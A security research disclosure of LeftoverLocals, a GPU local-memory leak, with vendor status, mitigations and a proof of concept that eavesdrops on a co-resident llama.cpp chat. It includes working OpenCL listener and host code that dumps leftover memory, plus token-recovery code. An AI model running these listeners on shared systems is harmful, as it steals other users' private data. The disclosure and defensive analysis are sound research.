LeftoverLocals: Listening to LLM responses through leaked GPU local memory

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries, as shown below:

Figure 1: An illustration of how LeftoverLocals can be used to implement an attack on an interactive LLM chat session. The LLM user (left) queries the LLM, while a co-resident attacker (right) can listen to the LLM response.

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.


Figure 2: LeftoverLocals logo: what leftover data is your ML model leaving for another user to steal?

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.

As of writing, the status of the impacted vendors (Apple, AMD, Qualcomm, and Imagination) is as follows:

  • Apple: Despite multiple efforts to establish contact through CERT/CC, we only received a response from Apple on January 13, 2024. We re-tested the vulnerability on January 10, and it appears that some devices have been patched, e.g., the Apple iPad Air 3rd generation (A12). However, the issue still appears to be present on the Apple MacBook Air (M2). Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been. Apple has confirmed that the A17 and M3 series processors contain fixes, but we have not been notified of the specific patches deployed across their devices.
  • AMD: We have confirmed with AMD that their devices remain impacted, although they continue to investigate potential mitigation plans. Their statement on the issue can be read here.
  • Qualcomm: We received notice that there is a patch to Qualcomm firmware v2.07 that addresses LeftoverLocals for some devices. However, there may still be other devices impacted at this time. A Qualcomm representative has provided the following comment: “Developing technologies that endeavor to support robust security and privacy is a priority for Qualcomm Technologies. We commend Dr. Tyler Sorensen and Dr. Heidy Khlaaf from the AI/ML Assurance group at Trail of Bits for using coordinated disclosure practices and are in the process of providing security updates to our customers. We encourage end users to apply security updates as they become available from their device makers.”
  • Imagination: Despite not observing LeftoverLocals ourselves across the Imagination GPUs that we tested, Google has confirmed that some Imagination GPUs are indeed impacted. Imagination released a fix in their latest DDK release, 23.3, made available to customers in December 2023.

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details:

  • NVIDIA: confirmed that their devices are not currently impacted. One reason for this could be that researchers have explored various memory leaks on NVIDIA GPUs previously, and thus, they are aware of these types of issues.
  • Arm: also confirmed that their devices are not currently impacted.

One further vendor, Intel, did not respond to us; however, we tested at least one of their GPUs and did not observe that it was impacted.

Exploit brief

GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had significant consequences for applications. Historically, this meant that GPU hardware and software stacks iterated rapidly, with frequent major architecture and programming model changes. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA simply provides a few short tables. This type of vague specification has led to alarming issues, both past and present, as LeftoverLocals exemplifies.

Exploitation requirements 

This is a co-resident exploit, meaning that a threat actor’s avenue of attack could be implemented as another application, app, or user on a shared machine. The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers (at least in obtaining stolen data). We note that it appears that browser GPU frameworks (e.g., WebGPU) are not currently impacted, as they insert dynamic memory checks into GPU kernels. 

Unless a user inspects an application’s low-level GPU source code, it is not possible for them to determine whether the application is using GPU local memory; this matter is further complicated because the GPU code is often hidden deep in library calls, at low levels of deep software stacks (e.g., for ML). Overall, there are very limited ways to observe that an attacker is currently stealing data, or has stolen data. This attack hinges on the attacker reading uninitialized memory on the GPU, and while this is technically undefined behavior, it is not currently checked dynamically or logged. Any additional defenses would be quite invasive, e.g., performing code analysis on GPU kernels to check for undefined behavior.

We have released a PoC that exploits this vulnerability, and the sections below describe how it works.

User mitigations 

Given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended against by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, the GPU threads should clear (e.g., store zeros to) any local memory locations that were used in the kernel. Additionally, users should ensure the compiler doesn’t optimize away these memory-clearing instructions (e.g., by annotating their local memory as volatile), as the compiler may detect that the cleared memory is not used later in the kernel. This is difficult to verify because GPU binaries are typically not stored explicitly, and there are very few GPU binary analysis tools. For reasons like this, we note that this mitigation may be difficult for many users, and we discuss this further in “Mitigations” below.
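
As an illustration, the sketch below shows what this mitigation can look like in an OpenCL kernel. The kernel name, LM_SIZE, and the elided body are placeholders; the essential parts are the volatile qualifier and the clearing loop that runs before the kernel returns.

// Hypothetical mitigation sketch: zero out local memory before the kernel ends.
// my_kernel, LM_SIZE, and the omitted body are illustrative placeholders.
__kernel void my_kernel(__global float *out) {
  // volatile discourages the compiler from eliding the clearing stores below
  local volatile float lm[LM_SIZE];

  // ... original kernel work that reads and writes lm ...

  // Wait until every invocation in the workgroup is done using local memory,
  // then cooperatively overwrite it with zeros.
  barrier(CLK_LOCAL_MEM_FENCE);
  for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0))
    lm[i] = 0.0f;
}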

The vulnerability: LeftoverLocals 

In this section we describe the vulnerability, named LeftoverLocals, and the corresponding exploit in more detail. We then detail our testing campaign across a wide variety of GPU devices, which found that GPUs from AMD, Apple, and Qualcomm are vulnerable to LeftoverLocals. For those unfamiliar with GPU architecture and terminology, we provide a more in-depth level-setter in “Background: How GPUs work.” We also note that while GPU memory leaks are not new (a further discussion follows below), LeftoverLocals has demonstrated both deeper impact and wider breadth than previously discovered vulnerabilities. 

At a high level, we found that several GPU frameworks do not sufficiently isolate memory in the same way that it is traditionally expected in CPU-based frameworks. We have observed that on impacted GPUs, it is possible for one kernel—potentially from another user that is co-resident on the same machine—to observe values in local memory that were written by another kernel. Thus, an attacker who has access to a shared GPU through its programmable interface (e.g., OpenCL) can steal memory from other users and processes, violating traditional process isolation properties. This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights. 

Previous academic work showed that NVIDIA GPUs leaked memory across processes through a variety of memory regions, including local memory. However, they examined only GPUs from NVIDIA (and the results from this paper may be part of the reason why we didn’t observe LeftoverLocals on NVIDIA GPUs). They also did not discuss the impact on widely deployed use cases, such as ML. Other works have shown how GPUs leak graphics data, and that a co-resident attacker can reconstruct partial visual information from another process (see some examples documented here, here, and here). Despite these prior works, LeftoverLocals shows that many GPUs remain vulnerable to local memory leaks and that this vulnerability can be exploited in co-resident attacks on important ML applications.

Overall, this vulnerability can be illustrated using two simple programs: a Listener and a Writer, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values. The Listener repeatedly launches a GPU kernel that reads from uninitialized local memory. The Writer repeatedly launches a GPU kernel that writes canary values to local memory. Below, we demonstrate how each of these operations is carried out. 

The Listener: The Listener launches a GPU kernel that reads from uninitialized local memory and stores the result in a persistent main memory region (i.e., global memory). This can be accomplished with the OpenCL kernel below: 

__kernel void listener(__global volatile int *dump) {
  local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i+= get_local_size(0)) {
    dump[((LM_SIZE * get_group_id(0)) + i)] = lm[i];
  }
}

The keyword __kernel denotes that this is the GPU kernel function. We pass a global memory array dump to the function. Whatever the kernel writes to this array can be read later by the CPU. We statically declare a local memory array lm with a predefined size LM_SIZE (which we set to be the max size of local memory for each GPU we test). This program technically contains undefined behavior, as it reads from uninitialized local memory. Because of this, we use the volatile qualifier to suppress aggressive compiler optimizations that might optimize away the memory accesses. In fact, our code contains a few more patterns intended to further stop the compiler from optimizing away our memory dump. This is more trial and error than science.

In each loop iteration, the invocation (thread) reads from a location in local memory and dumps that value to a unique location in the dump array. The only tricky part of this code is the indexing, because local memory is disjoint across workgroups, so workgroup-local IDs need to be mapped to a unique global index in dump. The process utilizes built-in identifiers to achieve this, which are documented here. At the end of the kernel, dump contains every value that was stored in local memory when the listener kernel started executing. Because dump is in the global memory region, it can be examined by the CPU host code to check for canary values.

The Writer: On the other hand, the Writer launches a kernel that writes a canary value to local memory (for example, this work uses the value 123). We show an example of the OpenCL kernel code below:

__kernel void writer(__global volatile int *canary) {
  local volatile int lm[LM_SIZE];
  for (uint i = get_local_id(0); i < LM_SIZE; i+=get_local_size(0)) {
    lm[i] = canary[i];
  }
}

This code is very similar to the Listener, except that rather than dumping local memory, we are writing a value. In this case, we are writing a value from an array canary. We use an extra array so that the compiler does not optimize away the memory write (as it is prone to do with constant values). At the end of the kernel, the writer has filled all available local memory with the canary values. 

The CPU programs for both the Listener and the Writer launch their respective kernels repeatedly. In the case of the listener, at each iteration, the CPU analyzes the values observed in the local memory and checks for the canary value. On a server, these two programs can be run by different users or in different Docker containers. On a mobile device, these routines can be run in different apps. The apps can be swapped in and out of focus to alternate reading and writing. If the Listener can reliably read the canary values, then we say that the platform is vulnerable to LeftoverLocals. 
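
As a concrete (hypothetical) example of the Listener’s host side, the C sketch below repeatedly launches the listener kernel shown earlier and scans the dumped buffer for the canary value. Error handling and device selection are omitted; LM_SIZE, NUM_GROUPS, the canary value, and the work sizes are illustrative assumptions rather than the PoC’s actual values.

/* Hypothetical Listener host loop (C, OpenCL). Error handling is omitted. */
#include <stdio.h>
#include <stdlib.h>
#include <CL/cl.h>

#define LM_SIZE    (16 * 1024)   /* assumed local memory size: 16K ints = 64KB */
#define NUM_GROUPS 64            /* assumed number of workgroups to launch */
#define CANARY     123           /* value the Writer stores */

static const char *listener_src =
  "__kernel void listener(__global volatile int *dump) {                  \n"
  "  local volatile int lm[LM_SIZE];                                      \n"
  "  for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0))   \n"
  "    dump[(LM_SIZE * get_group_id(0)) + i] = lm[i];                     \n"
  "}                                                                      \n";

int main(void) {
  cl_platform_id plat; cl_device_id dev;
  clGetPlatformIDs(1, &plat, NULL);
  clGetDeviceIDs(plat, CL_DEVICE_TYPE_GPU, 1, &dev, NULL);
  cl_context ctx = clCreateContext(NULL, 1, &dev, NULL, NULL, NULL);
  cl_command_queue q = clCreateCommandQueue(ctx, dev, 0, NULL);

  cl_program prog = clCreateProgramWithSource(ctx, 1, &listener_src, NULL, NULL);
  char opts[64];
  snprintf(opts, sizeof opts, "-DLM_SIZE=%d", LM_SIZE);
  clBuildProgram(prog, 1, &dev, opts, NULL, NULL);
  cl_kernel k = clCreateKernel(prog, "listener", NULL);

  size_t n = (size_t)LM_SIZE * NUM_GROUPS;      /* ints in the dump buffer */
  cl_mem dump = clCreateBuffer(ctx, CL_MEM_WRITE_ONLY, n * sizeof(cl_int), NULL, NULL);
  int *host = malloc(n * sizeof(int));
  clSetKernelArg(k, 0, sizeof(cl_mem), &dump);

  size_t local = 256, global = local * NUM_GROUPS;
  for (;;) {                                    /* listen repeatedly */
    clEnqueueNDRangeKernel(q, k, 1, NULL, &global, &local, 0, NULL, NULL);
    clEnqueueReadBuffer(q, dump, CL_TRUE, 0, n * sizeof(int), host, 0, NULL, NULL);
    for (size_t i = 0; i < n; i++)              /* scan for leaked canaries */
      if (host[i] == CANARY)
        printf("leak: canary observed at offset %zu\n", i);
  }
}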

The following animation shows how the listener and writer interact, and how the listener may observe values from the writer if local memory is not cleared. 

Figure 3: Listener and Writer processes: the Writer stores canary values in local memory, while the Listener reads uninitialized local memory to check for the canary values

Listening to LLM responses

In this section, we provide an overview of how LeftoverLocals can be exploited by a malicious actor (an attacker) to listen to another user’s (the victim) LLM responses on a multi-tenant GPU machine, followed by a detailed description of the PoC.

At a high level, both actors are executed as co-resident processes. The attack process implements the listener described above, with the additional steps of comparing the stolen values to various fingerprints. The victim process is unknowingly the writer, where instead of canary values, the values being written are sensitive components of an interactive LLM chat session. The attack ultimately follows two steps:

  • The attack process fingerprints the model that the victim process is using by repeatedly dumping (i.e., listening to) the leftover local memory, which, in this scenario, consists of sensitive components of the linear algebra operations used by the victim in the LLM model architecture.
  • The attacker then repeatedly listens to the victim’s process again, specifically waiting for the LLM to execute the output layer, which can be identified using weights or memory layout patterns from the earlier fingerprinting.

Note that the output layer is a matrix-vector multiplication with two inputs: the model weights, and the layer input—in other words, the values derived from the user input that propagated through the earlier layers of the deep neural network (DNN). Given that the model weights of the output layer are too large to comprehensively steal, an attacker can inspect available open-source models to fully obtain the weights through the exposed model fingerprint. We found that the second input to the last layer (i.e., the layer input) is small enough to fit into local memory. Thus, the entire layer input can be stolen, and the attacker can reproduce the final layer computation to uncover the final result of the DNN.
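
To make the final step concrete, the sketch below shows one way an attacker could reproduce the output-layer computation on the CPU: multiply the recovered weight matrix by the stolen layer input and take the argmax over the logits. The function name, layouts, and the greedy-decoding assumption are illustrative, not taken from the PoC.

/* Hypothetical sketch: recompute the output layer from the recovered weights
 * and the stolen layer input, then take the argmax to recover the next token.
 * Assumes greedy decoding; names and layouts are illustrative. */
#include <math.h>
#include <stddef.h>

size_t recover_token(const float *W,   /* vocab_size x hidden_dim, row-major */
                     const float *x,   /* stolen layer input, length hidden_dim */
                     size_t vocab_size, size_t hidden_dim) {
  size_t best = 0;
  float best_logit = -INFINITY;
  for (size_t t = 0; t < vocab_size; t++) {
    float logit = 0.0f;                 /* dot product: one row of W with x */
    for (size_t d = 0; d < hidden_dim; d++)
      logit += W[t * hidden_dim + d] * x[d];
    if (logit > best_logit) { best_logit = logit; best = t; }
  }
  return best;                          /* id of the most likely next token */
}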

Figure 4: Steps of the PoC exploit whereby an attacker process can uncover data to listen to another user’s interactive LLM session with high fidelity 

We note that this is a fairly straightforward attack, and with further creativity and ingenuity, a threat actor may be able to construct further complex and sophisticated malicious scenarios that may compromise ML applications in more severe ways. Below we provide a detailed description of the PoC, and the configuration and testing carried out on various GPU platforms to uncover their susceptibility to LeftoverLocals. 

Our configuration: We outline our configuration in the table below. Our attack builds on the llama.cpp LLM due to its simplicity and variety of support for GPU acceleration. In our example we use a large discrete GPU that we found to be susceptible to LeftoverLocals: the AMD Radeon RX 7900 XT. We configure llama.cpp to use OpenCL for GPU acceleration, which uses the CLBLAST linear algebra library. We use the wizardLM-7B.ggmlv3.q5_0.bin model, which can be obtained from Hugging Face. This model was selected due to its reasonable size, which enabled rapid prototyping and analysis; however, this attack is transferable to many different models. In our threat model, we assume that the victim is using the LLM in an interactive chat session. 

[Table: PoC configuration (GPU: AMD Radeon RX 7900 XT; framework: llama.cpp with OpenCL and CLBLAST; model: wizardLM-7B.ggmlv3.q5_0.bin)]

Modification: The attack requires an optimized GPU implementation of matrix-vector multiplication. We found that the current matrix-vector multiplication in llama.cpp (which does not call into CLBLAST) is not implemented in an optimized, idiomatic way: an idiomatic implementation stores partial dot product results in local memory and then combines them at the end. While there is a more complex approach using linear algebra to achieve the same results, for the simplicity of our PoC and demonstration, we replace the llama.cpp matrix-vector multiplication with our own, more idiomatic implementation (following GPU programming best practices).
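
As one example of such an idiomatic pattern (not the PoC’s actual replacement kernel; the names and work distribution below are assumptions), a matrix-vector multiply can assign one output element per workgroup, accumulate partial dot products in local memory, and combine them with a reduction:

// Hypothetical sketch of an idiomatic matrix-vector multiply (y = W * x):
// each workgroup computes one row's dot product, storing partial results in
// local memory and combining them at the end. Assumes the workgroup size is
// a power of two; names and layouts are illustrative.
__kernel void matvec(const int rows, const int cols,
                     __global const float *W,     // rows x cols, row-major
                     __global const float *x,     // input vector, length cols
                     __global float *y,           // output vector, length rows
                     __local float *partial) {    // one slot per invocation
  int row = get_group_id(0);      // one workgroup per output element
  int lid = get_local_id(0);
  int lsz = get_local_size(0);

  // Each invocation accumulates a strided slice of the dot product.
  float acc = 0.0f;
  for (int c = lid; c < cols; c += lsz)
    acc += W[row * cols + c] * x[c];
  partial[lid] = acc;             // partial dot products live in local memory
  barrier(CLK_LOCAL_MEM_FENCE);

  // Tree reduction in local memory to combine the partial results.
  for (int stride = lsz / 2; stride > 0; stride /= 2) {
    if (lid < stride)
      partial[lid] += partial[lid + stride];
    barrier(CLK_LOCAL_MEM_FENCE);
  }
  if (lid == 0)
    y[row] = partial[0];
}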

Step 1—Fingerprinting the model: An attacker can fingerprint a model if they can listen to several inference queries from the victim. In our configuration, the GPU contains roughly 5MB of local memory. The model has roughly 33 layers, each of which consists of a matrix multiplication operation. Matrix multiplication is often optimized on GPUs by using tiling: an approach that subdivides the matrices into smaller submatrices, performs the multiplications, and then combines the results (as detailed here). In many optimized libraries, including CLBLAST, local memory is used to cache these smaller matrices. Thus, for every layer, the attacker can steal ~2.5MB of the weights and ~2.5MB of the inputs. While this is a significant amount of data, we note that it is not enough to reconstruct the entire computation. Many of these layers have weights and inputs that are hundreds of MB in size.

However, for a whole inference computation (33 layers), the attacker can steal around 80MB of the weights, which is sufficient to fingerprint the model (assuming the user is using an open-source model, such as one that can be found on Hugging Face). Given this, we assume that it is a straightforward task to fingerprint the model, and thus for the attacker to obtain the full model being used by the victim.
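
For readers unfamiliar with tiling, the following sketch shows the general shape of a tiled matrix multiply in OpenCL. It is not CLBLAST’s kernel: the tile size, argument names, and the assumption that all dimensions divide evenly by the tile size are ours. The relevant point is that tiles of both the weights and the inputs are staged in local memory, which is where the listener picks them up.

// Hypothetical sketch of a tiled matrix multiply (C = A * B), assuming M, N,
// and K are multiples of TILE and a 2D workgroup of TILE x TILE invocations.
#define TILE 16
__kernel void matmul_tiled(const int M, const int N, const int K,
                           __global const float *A,   // M x K, row-major
                           __global const float *B,   // K x N, row-major
                           __global float *C) {       // M x N, row-major
  const int lrow = get_local_id(0), lcol = get_local_id(1);
  const int row  = TILE * get_group_id(0) + lrow;
  const int col  = TILE * get_group_id(1) + lcol;

  __local float Asub[TILE][TILE];   // local-memory tiles shared by the
  __local float Bsub[TILE][TILE];   // workgroup; left over after the kernel

  float acc = 0.0f;
  for (int t = 0; t < K / TILE; t++) {
    Asub[lrow][lcol] = A[row * K + (t * TILE + lcol)];
    Bsub[lrow][lcol] = B[(t * TILE + lrow) * N + col];
    barrier(CLK_LOCAL_MEM_FENCE);
    for (int k = 0; k < TILE; k++)
      acc += Asub[lrow][k] * Bsub[k][lcol];
    barrier(CLK_LOCAL_MEM_FENCE);
  }
  C[row * N + col] = acc;
}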

Step 2—Listening to the LLM output: The attacker can then turn their attention to the output layer of the DNN. In our configuration, we found that the output layer is a matrix-vector multiplication, rather than a matrix-matrix multiplication. The weights matrix is large (~128MB), but the input vector is quite small (~4KB). However, given that the attacker has fingerprinted the model in step 1, the attacker does not need to comprehensively steal the weights as they are available from the fingerprinted model.

Matrix-vector multiplication has a different GPU implementation than matrix-matrix multiplication. In the case where the input vector fits in local memory, the most performant implementation is often to cache the input vector in local memory, as it is used repeatedly (i.e., for repeated dot products). Because the input vector is stored entirely in local memory, the attacker can steal this entire vector. In determining whether the attacker has found local memory from the output layer, we discovered that the attacker could simply look for 4KB of floating point values with zeros on either side. In our testing, this unique fingerprint was associated with the output layer nearly every single time. For different models and different GPUs, this fingerprint will likely have to be recalibrated. 
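
The sketch below illustrates this caching pattern. It is not CLBLAST’s or the PoC’s kernel (names, layout, and work distribution are assumptions); it simply shows how the whole input vector ends up resident in local memory, where a subsequent listener kernel can recover it.

// Hypothetical matrix-vector multiply (y = W * x) that caches the input
// vector in local memory, since every dot product reuses it.
__kernel void matvec_cached(const int rows, const int cols,
                            __global const float *W,     // rows x cols, row-major
                            __global const float *x,     // input vector, length cols
                            __global float *y,           // output vector, length rows
                            __local float *x_local) {    // local buffer, length cols
  // Cooperatively stage the input vector into local memory.
  for (int i = get_local_id(0); i < cols; i += get_local_size(0))
    x_local[i] = x[i];
  barrier(CLK_LOCAL_MEM_FENCE);

  // Each invocation computes one or more output elements (dot products).
  for (int r = get_global_id(0); r < rows; r += get_global_size(0)) {
    float acc = 0.0f;
    for (int c = 0; c < cols; c++)
      acc += W[r * cols + c] * x_local[c];
    y[r] = acc;
  }
}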

Putting it together: With an attacker in possession of both the weights and the input vector, they can perform the final computation and obtain the result of the inference. This allows the attacker to reproduce the output of the victim’s LLM chat session with high fidelity, as demonstrated in the introduction. In practice, we tuned the attacker to dump the local memory very efficiently (that is, by using only a small number of threads and requiring a small amount of memory). This allows the attacker to listen to long chat queries with only a small number of noticeable artifacts. Some of the artifacts observed include: 

  • Duplicate tokens: This occurs when the attacker steals the same output layer twice due to circumstances such as the attacker process being scheduled twice in a row, thus the LLM was not scheduled to compute its next token. 
  • Missing tokens: This occurs when the attacker kernel isn’t scheduled at the right time, i.e., immediately after the output layer computation kernel. 
  • Incorrect tokens, occurring due to: 
    ◦ The attacker misidentifying a stolen set of data as the last layer; in this case, it will print a junk token. 
    ◦ Production of a token that is “close” to the original output, even if it is not exact. That is, the attacker may be unable to steal the exact token embedding at the target layer. This results in a corrupted token embedding which, when decoded, is semantically similar (in the word2vec sense) to the original token. As an example, in the GIF provided at the beginning, the attacker extracts the incorrect word “Facebook”, which is semantically similar to other named-entity tokens (like “Google” and “Amazon”) in the generated text. 

Despite these artifacts, the stolen text is more than sufficient to uncover the LLM response. Additionally, the attack can be further tuned, for example, by having multiple threads launch the listener kernel or by using a more precise fingerprint of the last layer. 

Testing GPU platforms for LeftoverLocals

Given the diversity of the devices we tested, we wrote several applications, in a variety of frameworks, that can test for LeftoverLocals:

  • Vulkan Command Line: A command line application using Vulkan. The kernel is written in OpenCL and compiled to SPIR-V using clspv. It uses a simple Vulkan wrapper called EasyVK.
  • OpenCL Command Line: A command line application that uses the OpenCL framework.
  • Apple App: An Apple app that can be deployed on iOS or Mac OS. It targets the GPU using Apple’s Metal framework.
  • Android App: An Android app that uses Vulkan to target mobile GPUs. The code uses Vulkan’s C API (through EasyVK again) using JNI. The kernels are the same as in the Vulkan command line app: they are written in OpenCL and compiled to SPIR-V using clspv.

Using the above programs, we tested 11 devices spanning seven GPU vendors (and multiple GPU frameworks in some cases). We observed LeftoverLocals on devices from three of the vendors (Apple, Qualcomm, and AMD). The amount of memory leaked depends on the size of the GPU. Larger GPUs contain more physical memory and thus leak more data. For the larger GPUs (e.g., an AMD Radeon RX 7900 XT), we found that we can leak ~5MB per kernel. The following table outlines the system information for the GPUs on which we observed LeftoverLocals (QC refers to Qualcomm): 

[Table: system information for the impacted GPUs (Apple, Qualcomm, and AMD devices)]

For some devices, specifically those from Arm, we were not able to observe the canary value from the Writer in the Listener, but we did observe non-zero data. Representatives from Arm reviewed our observations and concluded that although these values are not zero, they are not from a memory leak. 

[Table: system information for the Arm GPUs tested]

Additionally, we tested some GPUs from NVIDIA, Intel, and Imagination. For these devices, we observed only zeros in local memory, and thus did not observe LeftoverLocals. It is unclear whether all of their devices are unaffected. For example, although we did not observe the issue on our Imagination device, Google notified us that they were able to observe it on other Imagination devices. 

[Table: system information for the GPUs tested from NVIDIA, Intel, and Imagination, where LeftoverLocals was not observed]

The following YouTube video demonstrates the different interfaces and examples of LeftoverLocals—namely the LLM PoC attack, covert communication channels, and searching for canary values—on a few different platforms using a few different applications.

Vulnerable environments: An attack program must be co-resident on the same machine and must be “listening” at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Next, we briefly discuss other environments where GPUs are either deployed or where an attacker might have access to sensitive information. Although it appears that some current systems (e.g., WebGPU) are not currently impacted, the ever-growing prevalence of ML and the diversity of modern GPUs mean that the next iteration of these systems (or other near-future systems) may be severely compromised by these types of vulnerabilities.

  • Cloud providers: Cloud providers (e.g., AWS and Azure) are unlikely to provide shared GPU instances, especially if users have dedicated access to the GPU machine. In other cases, GPUs could be shared using very conservative GPU VM technology (such as NVIDIA’s vGPU or AMD’s MxGPU), which physically partitions the GPU and therefore prevents users from sharing GPU resources (e.g., local memory). Given this, many current cloud GPU systems may not currently be vulnerable to LeftoverLocals; however, we do not have conclusive evidence to determine this given the general lack of visibility into the specification and implementation of these systems. We note that we have observed LeftoverLocals on multi-user Linux servers, as well as on desktop (Windows and Mac) systems through traditional multi-processing. This includes Docker containers on these systems. 
  • Mobile applications: In our experiments and explorations in the mobile domain, we were able to run concurrent GPU processes (from different apps on iOS or Android) only in very specific instances. That is, we were not able to run a GPU process (e.g., from a malicious listener app) in the background while other apps (e.g., the victim) were run in the foreground. As with our analysis of cloud providers, we were unable to find clear documentation that explicitly detailed these constraints, and so we cannot definitively claim whether they are vulnerable. However, as seen in the video above, LeftoverLocals can be exploited either when a malicious listener app is run side-by-side with a victim app, or if the malicious listener app is quickly swapped from the background into the foreground from a victim app. 
  • Remote attacks: We preliminarily investigated the possibility of attacks originating from websites (e.g., those hosted by a remote attacker). To our knowledge, web applications do not have the low-level features required to listen to local memory using GPU graphics frameworks, such as WebGL. We note that the new WebGPU framework does provide low-level capabilities that allow a webpage to access local memory. Conservatively, WebGPU initializes local memory and performs dynamic array bounds checking on local memory (and global memory), which mitigates this vulnerability. However, these checks cause significant overhead, as documented in discussions like this one. To test this further, our code repo contains a simple listener in WebGPU. As expected, we have only observed zeros in local memory, even on devices that are vulnerable to LeftoverLocals through other frameworks. However, GPU compilers are known to be fragile, and it is not difficult to imagine finding a compiler bug that could somehow bypass these checks (especially using fuzzing techniques). Our position is that LeftoverLocals should be addressed at a lower level (e.g., the driver). 

How GPU vendors can resolve this vulnerability: To defend against LeftoverLocals, GPUs should clear their local memory between kernel calls. While this could cause some performance overhead, our experiments show that many GPU vendors (e.g., NVIDIA, Intel) currently appear to provide this functionality. Some of this functionality even appears to be provided for impacted GPUs. For example, Mesa drivers for AMD GPUs clear local memory after a compute kernel launch. However, this approach has a fundamental flaw that leaves it vulnerable to LeftoverLocals: the memory wipe is done with a separate kernel, so the GPU kernel queue may contain a malicious listener between the computation kernel and the local memory wipe, allowing the listener to steal memory. Instead, the computation kernel and the local memory wipe need to occur atomically, i.e., without allowing any other kernel to be interleaved between them. Otherwise, a user may attempt to preemptively defend themselves against LeftoverLocals as described in the next section. 

Mitigations: In light of a lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. As we’ve previously noted, before the kernel ends, the GPU threads should store 0 to any local memory locations that were used in the kernel. Given that GPU tasks are typically interleaved at the kernel boundary, this will prevent another user from being able to read leftover values. We note that this mitigation may be difficult for many users, especially because GPU code is often buried deep in complex software stacks (e.g., for ML). Furthermore, the GPU code may be part of a highly optimized library (e.g., ML linear algebra routines). In these cases, it is very difficult to identify how local memory is used, and even more difficult to modify the kernel to zero it out. It may be possible to augment a compiler to add this functionality, similar to how WebGPU handles GPU memory accesses (described above). These mitigations do have a performance overhead that should be taken into account. Another blunt mitigation involves simply avoiding multi-tenant GPU environments. 

Impact on LLMs and GPU platforms

LLM security

Our PoC attack examines only one application: an interactive open-source LLM session. However, with a little creativity, attackers could likely target many GPU applications, including those used within privacy-sensitive domains. Our motivation stems from the recent increased use and support of open-source models, often accompanied by claims that their “openness” inherently entails safety and security through transparency. A recent article in Nature even alleges that only open-source generative AI models can “safely” revolutionize health care, a safety-critical domain. Yet, even if open-source models provide the opportunity to be rigorously audited and assessed (which they have yet to be), their deployment still hinges on a closed-source stack (i.e., GPUs). And as demonstrated by LeftoverLocals, open-source LLMs are particularly susceptible to our vulnerability given our ability to fingerprint these models to obtain remaining weights as needed. Indeed, we have already observed announcements regarding the deployment of open-source models in collaboration with impacted GPU vendors, including Hugging Face’s collaboration with AMD, Lamini’s deployment on AMD GPUs, and the Qualcomm and Meta partnership for edge devices.

Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system. It is crucial to identify and taxonomize novel classes of failure modes that directly impact ML models, in addition to novel threats that can compromise the ML Ops pipeline, as we have demonstrated with LeftoverLocals. We discuss GPU-specific threat implications in the following section. 

GPU providers, applications, and vendors 

While many platforms are not currently impacted (see Vulnerable environments), we emphasize that the GPU compute landscape is evolving rapidly. As some examples: a growing number of GPU cloud providers have various policies and available configurations; and GPU programming frameworks, such as Vulkan and Metal, are well-supported on mainstream platforms, and can be used in apps without requiring extra privileges. While these developments are exciting, they increase the threat potential of GPU vulnerabilities, as LeftoverLocals illustrates. As far as we are aware, there is no unified security specification for how GPUs are required to handle sensitive data, and no portable test suite to check if systems are vulnerable to simple memory leaks, like LeftoverLocals. Thus, GPU compute environments should be rigorously scrutinized when used for processing any type of sensitive data. 

As mentioned above, while we focus on LLM applications, GPU local memory is one of the first tools a GPU developer reaches for when optimizing an application. Although such attacks would likely require analyzing the victim’s GPU kernel code to identify local memory usage, attacks are likely possible in other GPU compute domains, such as image processing and scientific computing. It will likely be increasingly difficult for users to detect and defend against these attacks since it’s unlikely they will know whether their application is vulnerable to LeftoverLocals; this would require knowing the details of the exact GPU kernel code, which is often hidden away in highly optimized linear algebra libraries (e.g., CLBLAST). Additionally, an overall lack of specification in up-and-coming GPU platforms makes it difficult to determine whether the compiler or runtime will use impacted memory regions without the user knowing. For example, Apple GPUs have a new caching mechanism, called dynamic caching, that does not have a clear specification regarding whether local memory regions are used for other purposes. 

Coordinated disclosure 

